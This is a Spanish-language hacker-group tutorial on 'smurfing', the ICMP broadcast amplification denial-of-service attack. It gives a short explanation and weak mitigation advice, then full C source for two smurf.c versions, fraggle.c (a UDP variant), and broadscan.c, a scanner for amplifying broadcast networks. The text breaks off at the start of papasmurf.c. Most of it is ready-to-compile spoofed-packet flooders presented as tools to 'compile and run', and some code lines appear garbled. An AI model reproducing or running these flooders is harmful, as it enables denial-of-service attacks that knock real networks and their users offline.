  3644.                           - J.J.F / Hackers Team -
  3645.  
  3646.   1.- Que es el SMURFING?
  3647.   2.- Como actua?
  3648.   3.- Forma de arreglarlo/detectarlo
  3649.       3.1.- Usando smurflog.tgz
  3650.       3.2.- Filtrando informacion
  3651.   4.- Herramientas
  3652.       smurf.c
  3653.       fraggle.c
  3654.       broadscan.c
  3655.       papasmurf.c
  3656.       papasmurf-linux.c
  3657.   5.- Creditos
  3658.  
  3659.   1.- Que es el SMURFING?
  3660.   -----------------------
  3661.  
  3662.         El smurfing es un tipo de ataque a traves de ICMP que basicamente lo
  3663.   que hace es flodear una red de ordenadores, simulando una IP falsa. Es un
  3664.   ataque bastante simple en si, pero muy desagradable tambien, te colapsa la
  3665.   red.
  3666.  
  3667.   2.- Como actua?
  3668.   ---------------
  3669.  
  3670.         Lo que hace basicamente es mandar un monton de paquetes por ICMP como
  3671.   dije antes. La manera de hacerlo es spoofeando las IP's de la red a atacar.
  3672.   El smurf lanza un ataque de, pongamos por ejemplo 25 Kbps de ICMP a una red
  3673.   de 100 ordenadores. Bien, digamos que la "ventaja" de este ataque es que te
  3674.   pueden mandar una burrada de paquetes a la vez, ya que son muy pequeños.
  3675.   El ordenador a los que le mandamos estos paquetes, analiza de donde vienen,
  3676.   pero al tener una IP simulada de la red a donde mandamos este ataque, el
  3677.   ordenador piensa que se lo esta mandando un ordenador de su misma red, por
  3678.   lo cual, le devuelve el ataque, PERO, se lo devuelve a otro ordenador
  3679.   distinto de la misma red, es decir, se estan atacando unos a otros dentro de
  3680.   su misma red sin saberlo. Este ataque es una manera de DoS (denial of
  3681.   service). Al poco rato la red se cae por inundacion (flood) de paquetes de
  3682.   informacion. Basicamente este ataque se usa mucho en los servers de IRC.
  3683.  
  3684.         Vamos a analizar este ataque un poco mas. Otra de las "ventajas" que
  3685.   tiene este ataque es que funciona desde cualquier sitio, es decir, no
  3686.   importa el tipo de conexion que tengas, te funciona desde un modem a 14.4
  3687.   hasta una T3, es la leche. Puedo asegurar que desde una T1 (a la cual
  3688.   tenemos acceso) funciona muy bien y la red se va al carajo en muy poco
  3689.   tiempo, el experimento fue realizado en la VPN (Virtual Private Network)
  3690.   de - J.J.F. / Hackers Team -, no os recomiendo que jugueis con las redes
  3691.   de la universidad, os pueden pillar :o).
  3692.  
  3693.   3.- Como arreglarlo/detectarlo
  3694.   ------------------------------
  3695.  
  3696.         Este es otro problema que tiene el SMURFING, no se puede arreglar. Al
  3697.   ser un ataque relativamente nuevo, todavia no se ha encontrado algo para
  3698.   arreglarlo. Si se ha encontrado la manera de detectarlo y encontrar al que
  3699.   te esta lanzando el ataque. Es un archivo para UNIX (en LinuX supongo que
  3700.   tambien chutara, no lo he probado) que se llama Smurflog.tgz, el cual lo
  3701.   podreis encontrar en http://www.rootshell.com. Se puede intentar arreglar de
  3702.   dos formas. Una de ellas es usando el smurlog.tgz y otra es cambiando las
  3703.   preferencias de la maquina, es decir con un filtro.
  3704.  
  3705.         Si no me equivoco, ahora mismo MCI esta trabajando en un parche para
  3706.   el smurf.c, podeis mirar por:
  3707.   http://www.internetnews.com/isp-news/1997/10/0901-mci.html
  3708.  
  3709.   3.1.- Usando smurflog.tgz
  3710.   -------------------------
  3711.  
  3712.         Este es un programa para UNIX, que basicamente lo que hace es loguear
  3713.   todo el proceso de ataque el cual te da quien te esta atacando y desde
  3714.   donde te esta atacando.
  3715.  
  3716.   3.2.- Filtrando informacion
  3717.   ---------------------------
  3718.  
  3719.         Se podria decir que esta es una manera un poco rudimentaria de
  3720.   protegerse del SMURFING. Lo que se hace es no aceptar paquetes de ICMP. Es
  3721.   una manera un poco lenta, pero evitas el riesgo de ataque o al menos reduce
  3722.   el daño que le pueda causar al ordenador. La verdad es que tambien al tener
  3723.   una red, el router juega un papel importante, como dije antes puedes denegar
  3724.   los accesos de ICMP, pero no es una de las mejores soluciones, aunque ayuda
  3725.   a que no entren paquetes ICMP. Lo bueno que tiene usar el router y denegar
  3726.   paquetes ICMP es que cuando se manda el ataque pasa a traves del router y
  3727.   si el router no lo identifica hace que el ataque no funcione. Esto se puede
  3728.   hacer simplemente añadiendo una linea al router, pero como dije antes, lo
  3729.   que hace es denegar ICMP hasta que termine el ataque.
  3730.  
  3731.   4.- Herramientas
  3732.   ----------------
  3733.  
  3734.         Basicamente se necesitan 5 programas para llevar a cabo este ataque y
  3735.   de los cuales esta puesto el codigo fuente un poco mas abajo de estas lineas
  3736.   :o). Pero antes vamos a ver que necesitamos.
  3737.  
  3738.   smurf.c: El smurf puro y duro, compilar y ejecutar.
  3739.   fraggle.c: Se puede decir que es un smurf, pero ya mas avanzado.
  3740.   broadscan.c: Scanner de IP's para saber por donde atacas, muy util.
  3741.   papasmurf.c: Es una mezcla entre el smurf.c y el fraggle.c
  3742.   papasmurf-linux.c: Claro, no? para que los usuarios de LinuX tambien puedan
  3743.                      jugar :o), es un programa que solo corre en plataforma
  3744.                      LinuX, de hecho esta especialmente diseñado para LinuX.
  3745.  
  3746.         Bien, despues de esta pequeña introduccion de las herramientas, vamos
  3747.   a ver los programas en pelota, es decir su codigo fuente, aqui van:
  3748.  
  3749.   SMURF.C (versiones 4.0 y 5.0)
  3750.   -----------------------------
  3751.  
  3752.   --- smurf.c v4.0 ---
  3753.  
  3754. ------------ Codigo Fuente ---------------------------------------------------
  3755.  
  3756. /*
  3757.  *
  3758.  *  $Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $
  3759.  *
  3760.  *  spoofs icmp packets from a host to various broadcast addresses resulting
  3761.  *  in multiple replies to that host from a single packet.
  3762.  *
  3763.  *  disclaimer:
  3764.  *     I cannot and will not be held responsible nor legally bound for the
  3765.  *     malicious activities of individuals who come into possession of this
  3766.  *     program and I refuse to provide help or support of any kind and do NOT
  3767.  *     condone use of this program to deny service to anyone or any machine.
  3768.  *     This is for educational use only. Please Don't abuse this.
  3769.  *
  3770.  *
  3771.  */
  3772.  
  3773. #include <signal.h>
  3774. #include <stdio.h>
  3775. #include <stdlib.h>
  3776. #include <sys/socket.h>
  3777. #include <sys/types.h>
  3778. #include <netinet/in.h>
  3779. #include <netinet/ip.h>
  3780. #include <netinet/ip_icmp.h>
  3781. #include <netdb.h>
  3782. #include <ctype.h>
  3783. #include <arpa/inet.h>
  3784. #include <unistd.h>
  3785. #include <string.h>
  3786.  
  3787. void banner(void);
  3788. void usage(char *);
  3789. void smurf(int, struct sockaddr_in, u_long, int);
  3790. void ctrlc(int);
  3791. unsigned short in_chksum(u_short *, int);
  3792.  
  3793. /* stamp */
  3794. char id[] = "$Id smurf.c,v 4.0 1997/10/11 13:02:42 EST tfreak Exp $";
  3795.  
  3796. int main (int argc, char *argv[])
  3797. {
  3798.    struct sockaddr_in sin;
  3799.    struct hostent *he;
  3800.    FILE   *bcastfile;
  3801.    int    i, sock, bcast, delay, num, pktsize, cycle = 0, x;
  3802.    char   buf[32], **bcastaddr = malloc(8192);
  3803.  
  3804.    banner();
  3805.    signal(SIGINT, ctrlc);
  3806.  
  3807.    if (argc < 6) usage(argv[0]);
  3808.  
  3809.    if ((he = gethostbyname(argv[1])) == NULL) {
  3810.       perror("resolving source host");
  3811.       exit(-1);
  3812.    }
  3813.    memcpy((caddr_t)&sin.sin_addr, he->h_addr, he->h_length);
  3814.    sin.sin_family = AF_INET;
  3815.    sin.sin_port = htons(0);
  3816.  
  3817.    num = atoi(argv[3]);
  3818.    delay = atoi(argv[4]);
  3819.    pktsize = atoi(argv[5]);
  3820.  
  3821.    if ((bcastfile = fopen(argv[2], "r")) == NULL) {
  3822.       perror("opening bcast file");
  3823.       exit(-1);
  3824.    }
  3825.    x = 0;
  3826.    while (!feof(bcastfile)) {
  3827.       fgets(buf, 32, bcastfile);
  3828.       if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) continue;
  3829.       for (i = 0; i < strlen(buf); i++)
  3830.           if (buf[i] == '\n') buf[i] = '\0';
  3831.       bcastaddr[x] = malloc(32);
  3832.       strcpy(bcastaddr[x], buf);
  3833.       x++;
  3834.    }
  3835.    bcastaddr[x] = 0x0;
  3836.    fclose(bcastfile);
  3837.  
  3838.    if (x == 0) {
  3839.       fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
  3840.       exit(-1);
  3841.    }
  3842.    if (pktsize > 1024) {
  3843.       fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
  3844.       exit(-1);
  3845.    }
  3846.  
  3847.    if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
  3848.       perror("getting socket");
  3849.       exit(-1);
  3850.    }
  3851.    setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *)&bcast, sizeof(bcast));
  3852.  
  3853.    printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
  3854.  
  3855.    for (i = 0; i < num || !num; i++) {
  3856.       if (!(i % 25)) { printf("."); fflush(stdout); }
  3857.       smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
  3858.       cycle++;
  3859.       if (bcastaddr[cycle] == 0x0) cycle = 0;
  3860.       usleep(delay);
  3861.    }
  3862.    puts("\n\n");
  3863.    return 0;
  3864. }
  3865.  
  3866. void banner (void)
  3867. {
  3868.    puts("\nsmurf.c v4.0 by TFreak\n");
  3869. }
  3870.  
  3871. void usage (char *prog)
  3872. {
  3873.    fprintf(stderr, "usage: %s <target> <bcast file> "
  3874.                    "<num packets> <packet delay> <packet size>\n\n"
  3875.                    "target        = address to hit\n"
  3876.                    "bcast file    = file to read broadcast addresses from\n"
  3877.                    "num packets   = number of packets to send (0 = flood)\n"
  3878.                    "packet delay  = wait between each packet (in ms)\n"
  3879.                    "packet size   = size of packet (< 1024)\n\n", prog);
  3880.    exit(-1);
  3881. }
  3882.  
  3883. void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize)
  3884. {
  3885.    struct iphdr *ip;
  3886.    struct icmphdr *icmp;
  3887.    char *packet;
  3888.  
  3889.    packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
  3890.    ip = (struct iphdr *)packet;
  3891.    icmp = (struct icmphdr *) (packet + sizeof(struct iphdr));
  3892.  
  3893.    memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
  3894.  
  3895.    ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize);
  3896.    ip->ihl = 5;
  3897.    ip->version = 4;
  3898.    ip->ttl = 255;
  3899.    ip->tos = 0;
  3900.    ip->frag_off = 0;
  3901.    ip->protocol = IPPROTO_ICMP;
  3902.    ip->saddr = sin.sin_addr.s_addr;
  3903.    ip->daddr = dest;
  3904.    ip->check = in_chksum((u_short *)ip, sizeof(struct iphdr));
  3905.    icmp->type = 8;
  3906.    icmp->code = 0;
  3907.   icmp->checksum = in_chksum((u_short *)icmp, sizeof(struct icmphdr) + psize);
  3908.  
  3909.    sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize,
  3910.           0, (struct sockaddr *)&sin, sizeof(struct sockaddr));
  3911.  
  3912.    free(packet);           /* free willy! */
  3913. }
  3914.  
  3915. void ctrlc (int ignored)
  3916. {
  3917.    puts("\nDone!\n");
  3918.    exit(1);
  3919. }
  3920.  
  3921. unsigned short in_chksum (u_short *addr, int len)
  3922. {
  3923.    register int nleft = len;
  3924.    register int sum = 0;
  3925.    u_short answer = 0;
  3926.  
  3927.    while (nleft > 1) {
  3928.       sum += *addr++;
  3929.       nleft -= 2;
  3930.    }
  3931.  
  3932.    if (nleft == 1) {
  3933.       *(u_char *)(&answer) = *(u_char *)addr;
  3934.       sum += answer;
  3935.    }
  3936.  
  3937.    sum = (sum >> 16) + (sum + 0xffff);
  3938.    sum += (sum >> 16);
  3939.    answer = ~sum;
  3940.    return(answer);
  3941. }
  3942.  
  3943. ------------ FIN -------------------------------------------------------------
  3944.  
  3945.   --- smurf.c v5.0 ---
  3946.  
  3947. ------------ Codigo Fuente ---------------------------------------------------
  3948.  
  3949. /*
  3950.  * $Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $
  3951.  *
  3952.  * spoofs icmp packets from a host to various broadcast addresses resulting in
  3953.  * multiple replies to that host from a single packet.
  3954.  *
  3955.  * disclaimer: I cannot and will not be held responsible nor legally bound for
  3956.  * the malicious activities of individuals who come into possession of this
  3957.  * program and I refuse to provide help or support of any kind and do NOT
  3958.  * condone use of this program to deny service to anyone or any machine. This
  3959.  * is for educational use only. Please Don't abuse this.
  3960.  *
  3961.  *
  3962.  */
  3963.  
  3964. #include <signal.h>
  3965. #include <stdio.h>
  3966. #include <stdlib.h>
  3967. #include <netdb.h>
  3968. #include <sys/socket.h>
  3969. #include <sys/types.h>
  3970. #include <netinet/in.h>
  3971. #include <netinet/in_systm.h>
  3972. #include <netinet/ip.h>
  3973. #include <netinet/ip_icmp.h>
  3974. #include <ctype.h>
  3975. #include <arpa/inet.h>
  3976. #include <unistd.h>
  3977. #include <string.h>
  3978.  
  3979. void            banner(void);
  3980. void            usage(char *);
  3981. void            smurf(int, struct sockaddr_in, u_long, int);
  3982. void            ctrlc(int);
  3983. unsigned int    host2ip(char *hostname);
  3984. unsigned short  in_chksum(u_short *, int);
  3985.  
  3986. unsigned int
  3987. host2ip(char *hostname)
  3988. {
  3989.         static struct in_addr i;
  3990.         struct hostent *h;
  3991.         i.s_addr = inet_addr(hostname);
  3992.         if (i.s_addr == -1) {
  3993.                 h = gethostbyname(hostname);
  3994.                 if (h == NULL) {
  3995.                         fprintf(stderr, "can't find %s\n.", hostname);
  3996.                         exit(0);
  3997.                 }
  3998.                 bcopy(h->h_addr, (char *) &i.s_addr, h->h_length);
  3999.         }
  4000.         return i.s_addr;
  4001. }
  4002.  
  4003. /* stamp */
  4004. char       id[] = "$Id smurf.c,v 5.0 1997/10/13 22:37:21 CDT griffin Exp $";
  4005.  
  4006. int
  4007. main(int argc, char *argv[])
  4008. {
  4009.         struct sockaddr_in sin;
  4010.         FILE           *bcastfile;
  4011.         int             i, sock, bcast, delay, num, pktsize, cycle = 0,
  4012.                         x;
  4013.         char            buf[32], **bcastaddr = malloc(8192);
  4014.  
  4015.         banner();
  4016.         signal(SIGINT, ctrlc);
  4017.  
  4018.         if (argc < 6)
  4019.                 usage(argv[0]);
  4020.  
  4021.         sin.sin_addr.s_addr = host2ip(argv[1]);
  4022.         sin.sin_family = AF_INET;
  4023.  
  4024.         num = atoi(argv[3]);
  4025.         delay = atoi(argv[4]);
  4026.         pktsize = atoi(argv[5]);
  4027.  
  4028.         if ((bcastfile = fopen(argv[2], "r")) == NULL) {
  4029.                 perror("opening bcast file");
  4030.                 exit(-1);
  4031.         }
  4032.         x = 0;
  4033.         while (!feof(bcastfile)) {
  4034.                 fgets(buf, 32, bcastfile);
  4035.                 if (buf[0] == '#' || buf[0] == '\n' || !isdigit(buf[0]))
  4036.                         continue;
  4037.                 for (i = 0; i < strlen(buf); i++)
  4038.                         if (buf[i] == '\n')
  4039.                                 buf[i] = '\0';
  4040.                 bcastaddr[x] = malloc(32);
  4041.                 strcpy(bcastaddr[x], buf);
  4042.                 x++;
  4043.         }
  4044.         bcastaddr[x] = 0x0;
  4045.         fclose(bcastfile);
  4046.  
  4047.         if (x == 0) {
  4048.         fprintf(stderr, "ERROR: no broadcasts found in file %s\n\n", argv[2]);
  4049.         exit(-1);
  4050.         }
  4051.         if (pktsize > 1024) {
  4052.                 fprintf(stderr, "ERROR: packet size must be < 1024\n\n");
  4053.                 exit(-1);
  4054.         }
  4055.         if ((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
  4056.                 perror("getting socket");
  4057.                 exit(-1);
  4058.         }
  4059.    setsockopt(sock, SOL_SOCKET, SO_BROADCAST, (char *) &bcast, sizeof(bcast));
  4060.  
  4061.         printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
  4062.  
  4063.         for (i = 0; i < num || !num; i++) {
  4064.                 if (!(i % 25)) {
  4065.                         printf(".");
  4066.                         fflush(stdout);
  4067.                 }
  4068.                 smurf(sock, sin, inet_addr(bcastaddr[cycle]), pktsize);
  4069.                 cycle++;
  4070.                 if (bcastaddr[cycle] == 0x0)
  4071.                         cycle = 0;
  4072.                 usleep(delay);
  4073.         }
  4074.         puts("\n\n");
  4075.         return 0;
  4076. }
  4077.  
  4078. void
  4079. banner(void)
  4080. {
  4081.         puts("\nsmurf.c v5.0 by TFreak, ported by Griffin\n");
  4082. }
  4083.  
  4084. void
  4085. usage(char *prog)
  4086. {
  4087.         fprintf(stderr, "usage: %s <target> <bcast file> "
  4088.                 "<num packets> <packet delay> <packet size>\n\n"
  4089.                 "target        = address to hit\n"
  4090.                 "bcast file    = file to read broadcast addresses from\n"
  4091.                 "num packets   = number of packets to send (0 = flood)\n"
  4092.                 "packet delay  = wait between each packet (in ms)\n"
  4093.                 "packet size   = size of packet (< 1024)\n\n", prog);
  4094.         exit(-1);
  4095. }
  4096.  
  4097. void
  4098. smurf(int sock, struct sockaddr_in sin, u_long dest, int psize)
  4099. {
  4100.         struct ip      *ip;
  4101.         struct icmp    *icmp;
  4102.         char           *packet;
  4103.         int             hincl = 1;
  4104.  
  4105.         packet = malloc(sizeof(struct ip) + sizeof(struct icmp) + psize);
  4106.         ip = (struct ip *) packet;
  4107.         icmp = (struct icmp *) (packet + sizeof(struct ip));
  4108.  
  4109.         memset(packet, 0, sizeof(struct ip) + sizeof(struct icmp) + psize);
  4110.         setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
  4111.         ip->ip_len = sizeof(struct ip) + sizeof(struct icmp) + psize;
  4112.         ip->ip_hl = sizeof *ip >> 2;
  4113.         ip->ip_v = 4;
  4114.         ip->ip_ttl = 255;
  4115.         ip->ip_tos = 0;
  4116.         ip->ip_off = 0;
  4117.         ip->ip_id = htons(getpid());
  4118.         ip->ip_p = 1;
  4119.         ip->ip_src.s_addr = sin.sin_addr.s_addr;
  4120.         ip->ip_dst.s_addr = dest;
  4121.         ip->ip_sum = 0;
  4122.         icmp->icmp_type = 8;
  4123.         icmp->icmp_code = 0;
  4124.         icmp->icmp_cksum = htons(~(ICMP_ECHO << 8));
  4125.  
  4126.         sendto(sock, packet, sizeof(struct ip) + sizeof(struct icmp) + psize,
  4127.                0, (struct sockaddr *) & sin, sizeof(struct sockaddr));
  4128.  
  4129.         free(packet);           /* free willy! */
  4130. }
  4131.  
  4132. void
  4133. ctrlc(int ignored)
  4134. {
  4135.         puts("\nDone!\n");
  4136.         exit(1);
  4137. }
  4138.  
  4139. unsigned short
  4140. in_chksum(u_short * addr, int len)
  4141. {
  4142.         register int    nleft = len;
  4143.         register int    sum = 0;
  4144.         u_short         answer = 0;
  4145.  
  4146.         while (nleft > 1) {
  4147.                 sum += *addr++;
  4148.                 nleft -= 2;
  4149.         }
  4150.  
  4151.         if (nleft == 1) {
  4152.                 *(u_char *) (&answer) = *(u_char *) addr;
  4153.                 sum += answer;
  4154.         }
  4155.         sum = (sum >> 16) + (sum + 0xffff);
  4156.         sum += (sum >> 16);
  4157.         answer = ~sum;
  4158.         return (answer);
  4159. }
  4160.  
  4161. ------------ FIN -------------------------------------------------------------
  4162.  
  4163.   --- fraggle.c ---
  4164.  
  4165. ------------ Codigo Fuente ---------------------------------------------------
  4166.  
  4167. /*
  4168.  *  fraggle.c by TFreak
  4169.  *
  4170.  *  This is basically smurf.c with a udp twist.  There are _many_ interesting
  4171.  *  things you can do with this program, I suggest you experiment with it.
  4172.  *
  4173.  *  Disclaimer:
  4174.  *     I cannot and will not be held responsible nor legally bound for the
  4175.  *     malicious activities of individuals who come into possession of this
  4176.  *     program and I refuse to provide help or support of any kind and do NOT
  4177.  *     condone or promote use of this program to deny service to anyone or any
  4178.  *     machine.  This is for educational use only. Please don't abuse this.
  4179.  *
  4180.  *  "Love is much more evil than hate will ever be ..."
  4181.  */
  4182.  
  4183. #include <arpa/inet.h>
  4184. #include <ctype.h>
  4185. #include <netdb.h>
  4186. #include <netinet/in.h>
  4187. #include <netinet/ip.h>
  4188. #include <netinet/ip_udp.h>
  4189. #include <stdio.h>
  4190. #include <stdlib.h>
  4191. #include <string.h>
  4192. #include <signal.h>
  4193. #include <sys/socket.h>
  4194. #include <sys/types.h>
  4195. #include <time.h>
  4196. #include <unistd.h>
  4197.  
  4198. struct pktinfo
  4199. {
  4200.     int ps;
  4201.     int src;
  4202.     int dst;
  4203. };
  4204.  
  4205. void fraggle (int, struct sockaddr_in *, u_long dest, struct pktinfo *);
  4206. void sigint (int);
  4207. unsigned short checksum (u_short *, int);  
  4208.  
  4209. int main (int argc, char *argv[])
  4210. {
  4211.     struct sockaddr_in sin;
  4212.     struct hostent *he;
  4213.     struct pktinfo p;
  4214.     int s, num, delay, n, cycle;
  4215.     char **bcast = malloc(1024), buf[32];
  4216.     FILE *bfile;
  4217.  
  4218.     /* banner */
  4219.     fprintf(stderr, "\nfraggle.c by TFreak\n\n");
  4220.  
  4221.     /* capture ctrl-c */
  4222.     signal(SIGINT, sigint);
  4223.  
  4224.     /* check for enough cmdline args */
  4225.     if (argc < 5)
  4226.     {
  4227.         fprintf(stderr, "usage: %s <target> <bcast file> <num packets> "
  4228.                         "<packet delay> [dstport] [srcport] [psize] \n\n"
  4229.                         "target\t\t= address to hit\n"
  4230.                         "bcast file\t= file containing broadcast addrs\n"
  4231.                         "num packets\t= send n packets (n = 0 is constant)\n"
  4232.                         "packet delay\t= usleep() between packets (in ms)\n"
  4233.                         "dstport\t\t= port to hit (default 7)\n"
  4234.                         "srcport\t\t= source port (0 for random)\n"
  4235.                         "ps\t\t= packet size\n\n",
  4236.                         argv[0]);
  4237.         exit(-1);
  4238.     }
  4239.  
  4240.     /* get port info */
  4241.     if (argc >= 6)
  4242.         p.dst = atoi(argv[5]);
  4243.     else
  4244.         p.dst = 7;
  4245.     if (argc >= 7)
  4246.         p.src = atoi(argv[6]);
  4247.     else
  4248.         p.src = 0;
  4249.  
  4250.     /* packet size redundant if not using echo port */
  4251.     if (argc >= 8)
  4252.         p.ps = atoi(argv[7]);
  4253.     else
  4254.         p.ps = 1;
  4255.  
  4256.     /* other variables */
  4257.     num = atoi(argv[3]);
  4258.     delay = atoi(argv[4]);
  4259.  
  4260.     /* resolve host */
  4261.     if (isdigit(*argv[1]))
  4262.         sin.sin_addr.s_addr = inet_addr(argv[1]);
  4263.     else
  4264.     {
  4265.         if ((he = gethostbyname(argv[1])) == NULL)
  4266.         {
  4267.             fprintf(stderr, "Can't resolve hostname!\n\n");
  4268.             exit(-1);
  4269.         }
  4270.  
  4271.         memcpy( (caddr_t) &sin.sin_addr, he->h_addr, he->h_length);
  4272.     }
  4273.     sin.sin_family = AF_INET;
  4274.     sin.sin_port = htons(0);
  4275.  
  4276.     /* open bcast file and build array */
  4277.     if ((bfile = fopen(argv[2], "r")) == NULL)
  4278.     {
  4279.         perror("opening broadcast file");
  4280.         exit(-1);
  4281.     }
  4282.     n = 0;
  4283.     while (fgets(buf, sizeof buf, bfile) != NULL)
  4284.     {
  4285.         buf[strlen(buf) - 1] = 0;
  4286.         if (buf[0] == '#' || buf[0] == '\n' || ! isdigit(buf[0])) 
  4287.             continue;
  4288.         bcast[n] = malloc(strlen(buf) + 1);
  4289.         strcpy(bcast[n], buf);
  4290.         n++;
  4291.     }
  4292.     bcast[n] = '\0';
  4293.     fclose(bfile);
  4294.  
  4295.     /* check for addresses */
  4296.     if (!n)
  4297.     {
  4298.         fprintf(stderr, "Error:  No valid addresses in file!\n\n");
  4299.         exit(-1);
  4300.     }
  4301.  
  4302.     /* create our raw socket */
  4303.     if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) <= 0)
  4304.     {
  4305.         perror("creating raw socket");
  4306.         exit(-1);
  4307.     }
  4308.  
  4309.     printf("Flooding %s (. = 25 outgoing packets)\n", argv[1]);
  4310.  
  4311.     for (n = 0, cycle = 0; n < num || !num; n++)
  4312.     {
  4313.         if (!(n % 25))
  4314.         {
  4315.             printf(".");
  4316.             fflush(stdout);
  4317.         }
  4318.  
  4319.         srand(time(NULL) * rand() * getpid());
  4320.  
  4321.         fraggle(s, &sin, inet_addr(bcast[cycle]), &p);
  4322.         if (bcast[++cycle] == NULL) 
  4323.             cycle = 0;
  4324.         usleep(delay);
  4325.     }
  4326.  
  4327.     sigint(0);
  4328. }
  4329.  
  4330. void fraggle (int s, struct sockaddr_in *sin, u_long dest, struct pktinfo *p)
  4331. {
  4332.     struct iphdr *ip;
  4333.     struct udphdr *udp;
  4334.     char *packet;
  4335.     int r;
  4336.  
  4337.     packet = malloc(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
  4338.     ip = (struct iphdr *)packet;
  4339.     udp = (struct udphdr *) (packet + sizeof(struct iphdr));
  4340.  
  4341.     memset(packet, 0, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
  4342.  
  4343.     /* ip header */
  4344.     ip->protocol = IPPROTO_UDP;
  4345.     ip->saddr = sin->sin_addr.s_addr;
  4346.     ip->daddr = dest;
  4347.     ip->version = 4;
  4348.     ip->ttl = 255;
  4349.     ip->tos = 0;
  4350.     ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps);
  4351.     ip->ihl = 5;
  4352.     ip->frag_off = 0;
  4353.     ip->check = checksum((u_short *)ip, sizeof(struct iphdr));
  4354.  
  4355.     /* udp header */
  4356.     udp->len = htons(sizeof(struct udphdr) + p->ps);
  4357.     udp->dest = htons(p->dst);
  4358.     if (!p->src)
  4359.         udp->source = htons(rand());
  4360.     else
  4361.         udp->source = htons(p->src);
  4362.  
  4363.     /* send it on its way */
  4364.    r = sendto(s, packet, sizeof(struct iphdr) + sizeof(struct udphdr) + p->ps,
  4365.                0, (struct sockaddr *) sin, sizeof(struct sockaddr_in));
  4366.     if (r == -1)
  4367.     {
  4368.         perror("\nSending packet");
  4369.         exit(-1);
  4370.     }
  4371.  
  4372.     free(packet);        /* free willy 2! */
  4373. }
  4374.  
  4375. unsigned short checksum (u_short *addr, int len)
  4376. {
  4377.     register int nleft = len;
  4378.     register u_short *w = addr;
  4379.     register int sum = 0;
  4380.     u_short answer = 0;
  4381.  
  4382.     while (nleft > 1)
  4383.     {
  4384.         sum += *w++;
  4385.         nleft--;
  4386.     }
  4387.  
  4388.     if (nleft == 1)
  4389.     {
  4390.         *(u_char *) (&answer) = *(u_char *) w;
  4391.         sum += answer;
  4392.     }
  4393.  
  4394.     sum = (sum >> 17) + (sum & 0xffff);
  4395.     sum += (sum >> 17);
  4396.     answer = -sum;
  4397.     return (answer);
  4398. }
  4399.  
  4400. void sigint (int ignoremewhore)
  4401. {
  4402.     fprintf(stderr, "\nDone!\n\n");
  4403.     exit(0);
  4404. }
  4405.  
  4406. ------------ FIN -------------------------------------------------------------
  4407.  
  4408.   --- broadscan.c v0.31 ---
  4409.  
  4410. ------------ Codigo Fuente ---------------------------------------------------
  4411.  
  4412. /* Broadscan v 0.31   DUP Broadcast IP scanner
  4413.    by Vacuum http://www.technotronic.com   09-03-98
  4414.    This is a very lame scanner written to
  4415.    stop people from asking how to find
  4416.    DUP broadcast ip addresses. Use this in
  4417.    conjunction with smurf, fraggle,
  4418.    or papasmurf. DoS kiddies enjoy!
  4419.  
  4420. */#include <stdlib.h>
  4421. #include <stdio.h>
  4422. #define DEBUG 1FILE *stream;
  4423. void pingz0r(int first, int second, int start, int end)
  4424. {
  4425. int counter,flag;
  4426. FILE *stream;
  4427. char tempstring[2048];
  4428. char parse[2048];
  4429. for (counter=start; counter <end; counter++)
  4430. {
  4431.  flag=0;
  4432.  sprintf(tempstring,"ping -c 2 -n  %d.%d.%d.255 2>/dev/null",first,
  4433.                      second, counter); 
  4434. stream=popen(tempstring,"r");
  4435.  while (fgets(parse,sizeof(parse),stream)!=NULL)
  4436.  {
  4437.   if (DEBUG) printf("Results:%s",parse);
  4438.   if (strstr(parse,"DUP"))
  4439.   {
  4440.     flag=1;
  4441.     fclose(stream);
  4442.     break;
  4443.   }
  4444.  }
  4445.  if (flag==1) stream=fopen("broadcast.txt", "a");
  4446.   fprintf(stream, "%d.%d.%d.255\n",first,second,counter);
  4447.  fclose( stream);
  4448. }
  4449. }
  4450. main(int argc, char *argv[])
  4451. {
  4452. int first,second;
  4453. if (argc!=3)
  4454.  {
  4455.   printf("\nusage : %s <octet> <octet>\n\n",argv[0]);
  4456.   exit(0);
  4457.  }
  4458. first=atoi(argv[1]);second=atoi(argv[2]);
  4459. if (first==127)
  4460.  {
  4461.  printf("%d is a localhost. You have no clue or are trying
  4462.  to break this program",first);
  4463.  exit(0);
  4464.  }
  4465. if (first>254  || first <0)
  4466.  {
  4467.  printf("First octet is: %d. It must be between <1-254>",first);
  4468.  exit(0);
  4469.  }
  4470. if (second>254 || second<0)
  4471.  {
  4472.  printf("Second octet is: %d. It must be <1-254>",second);
  4473.  exit(0);
  4474.  }
  4475.  printf("Scanning for DUP broadcast ip addresses\n");
  4476. printf("Results output to broadcast.txt\n");
  4477. if (fork()!=0)
  4478.     pingz0r(first,second,0,128);
  4479. else
  4480.     pingz0r(first,second,128,255);
  4481. }
  4482.  
  4483. ------------ FIN -------------------------------------------------------------
  4484.  
  4485.   --- papasmurf.c v5.0 ---
  4486.  
  4487. ------------ Codigo Fuente ---------------------------------------------------
  4488.  
  4489. /*
  4490.  *  (papa)smurf.c v5.0 by TFreak - http://www.rootshell.com
  4491.  *
  4492.  *
  4493.  *  To compile: "gcc -DLINUX -o smurf5 papasmurf.c" if your LINUXish.
  4494.  *                                 or just
  4495.  *              "gcc -o smurf5 papasmurf.c" if your BSDish.
  4496.  *  
